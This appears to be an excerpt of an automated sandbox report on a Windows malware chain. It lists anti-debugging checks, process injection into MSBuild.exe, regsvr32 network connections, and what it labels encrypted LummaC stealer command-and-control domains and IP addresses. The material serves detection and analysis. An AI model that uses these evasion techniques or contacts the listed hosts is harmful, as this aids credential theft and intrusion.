Source: C:\Users\user\AppData\Local\Temp\1062162001\f35b37b5a5.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1062162001\f35b37b5a5.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1062162001\f35b37b5a5.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\1062162001\f35b37b5a5.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1062162001\f35b37b5a5.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1062162001\f35b37b5a5.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062162001\f35b37b5a5.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1062162001\f35b37b5a5.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1062162001\f35b37b5a5.exe	Process queried: DebugPort
Source: C:\Windows\System32\regsvr32.exe	Process queried: DebugPort

Source: C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe

Code function: 4_2_04E30CDD rdtsc

4_2_04E30CDD

Source: C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe	Code function: 4_2_005C652B mov eax, dword ptr fs:[00000030h]	4_2_005C652B
Source: C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe	Code function: 4_2_005CA302 mov eax, dword ptr fs:[00000030h]	4_2_005CA302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 5_2_00C5A302 mov eax, dword ptr fs:[00000030h]	5_2_00C5A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 5_2_00C5652B mov eax, dword ptr fs:[00000030h]	5_2_00C5652B

Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\regsvr32.exe	Process token adjusted: Debug
Source: C:\Windows\System32\regsvr32.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\regsvr32.exe	Network Connect: 208.95.112.1 80
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 91.212.166.99 4404

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe PID: 5008, type: MEMORYSTR

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC0000 value starts with: 4D5A

LummaC encrypted strings found

Source: f35b37b5a5.exe, 00000017.00000002.2713823170.0000000000BA1000.00000040.00000001.01000000.0000000F.sdmp	String found in binary or memory: finickypwk.lat
Source: f35b37b5a5.exe, 00000017.00000002.2713823170.0000000000BA1000.00000040.00000001.01000000.0000000F.sdmp	String found in binary or memory: shoefeatthe.lat
Source: f35b37b5a5.exe, 00000017.00000002.2713823170.0000000000BA1000.00000040.00000001.01000000.0000000F.sdmp	String found in binary or memory: savorraiykj.lat
Source: f35b37b5a5.exe, 00000017.00000002.2713823170.0000000000BA1000.00000040.00000001.01000000.0000000F.sdmp	String found in binary or memory: kickykiduz.lat
Source: f35b37b5a5.exe, 00000017.00000002.2713823170.0000000000BA1000.00000040.00000001.01000000.0000000F.sdmp	String found in binary or memory: miniatureyu.lat
Source: f35b37b5a5.exe, 00000017.00000002.2713823170.0000000000BA1000.00000040.00000001.01000000.0000000F.sdmp	String found in binary or memory: leggelatez.lat
Source: f35b37b5a5.exe, 00000017.00000002.2713823170.0000000000BA1000.00000040.00000001.01000000.0000000F.sdmp	String found in binary or memory: washyceehsu.lat
Source: f35b37b5a5.exe, 00000017.00000002.2713823170.0000000000BA1000.00000040.00000001.01000000.0000000F.sdmp	String found in binary or memory: bloodyswif.lat
Source: f35b37b5a5.exe, 00000017.00000002.2713823170.0000000000BA1000.00000040.00000001.01000000.0000000F.sdmp	String found in binary or memory: breakfasutwy.cyou

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC0000
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC0064
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC00C8
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC012C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC0190
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC01F4
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC0258
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC02BC
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC0320
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC0384
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC03E8
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC044C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC04B0
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC0514
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC0578
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC05DC
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC0640
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC06A4
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC0708
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC076C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC07D0
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC0834
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC0898
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC08FC
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC0960
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC09C4
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC0A28
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC0A8C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC0AF0
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC0B54
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC0BB8
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC0C1C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC0C80
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC0CE4
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC0D48
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC0DAC
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC0E10
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC0E74
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC0ED8
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC0F3C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC0FA0
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC1004
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC1068
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC10CC
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC1130
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC1194
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC11F8
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC125C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC12C0
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC1324
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC1388
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC13EC
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC1450
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC14B4
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC1518
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC157C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC15E0
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC1644
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC16A8
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC170C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC1770
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC17D4
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC1838
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC189C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC1900
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC1964
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC19C8
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC1A2C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC1A90
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC1AF4
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC1B58
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC1BBC
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC1C20
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC1C84
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC1CE8
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC1D4C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC1DB0
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC1E14
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC1E78
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC1EDC
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC1F40
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC1FA4
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC2008
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC206C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC20D0
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC2134
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC2198
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC21FC
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC2260
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC22C4
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC2328
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC238C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC23F0
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC2454
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC24B8
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC251C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC2580
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC25E4
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC2648
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC26AC
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC2710
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC2774
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC27D8
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC283C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC28A0
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC2904
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC2968
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC29CC
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC2A30
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC2A94
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC2AF8
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC2B5C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC2BC0
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC2C24
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC2C88
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC2CEC
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC2D50
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC2DB4
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC2E18
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC2E7C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC2EE0
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC2F44
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC2FA8
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC300C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC3070
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC30D4
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC3138
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC319C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC3200
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC3264
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC32C8
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC332C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC3390
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC33F4
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC3458
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC34BC
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC3520
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC3584
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC35E8
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC364C
